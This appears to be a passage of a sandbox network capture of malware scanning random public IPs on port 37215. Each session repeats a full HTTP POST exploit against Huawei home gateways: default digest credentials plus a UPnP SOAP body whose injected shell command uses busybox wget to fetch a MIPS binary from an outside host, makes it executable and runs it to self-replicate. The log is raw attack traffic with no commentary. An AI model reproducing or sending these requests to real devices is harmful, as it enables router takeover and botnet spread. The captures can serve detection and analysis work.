6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2157192.168.2.133402241.196.191.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726253033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2158192.168.2.134256641.34.194.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726269960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2159192.168.2.1335582157.235.114.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726284981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2160192.168.2.1350000193.184.88.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726305008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2161192.168.2.1352020157.16.67.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726334095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2162192.168.2.1333728157.85.189.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.726372004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2163192.168.2.1348214197.99.234.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728147984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2164192.168.2.1337334211.104.43.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728167057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2165192.168.2.1334716157.170.85.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728230000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2166192.168.2.1342756197.49.146.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728238106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2167192.168.2.1346326197.116.148.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728262901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
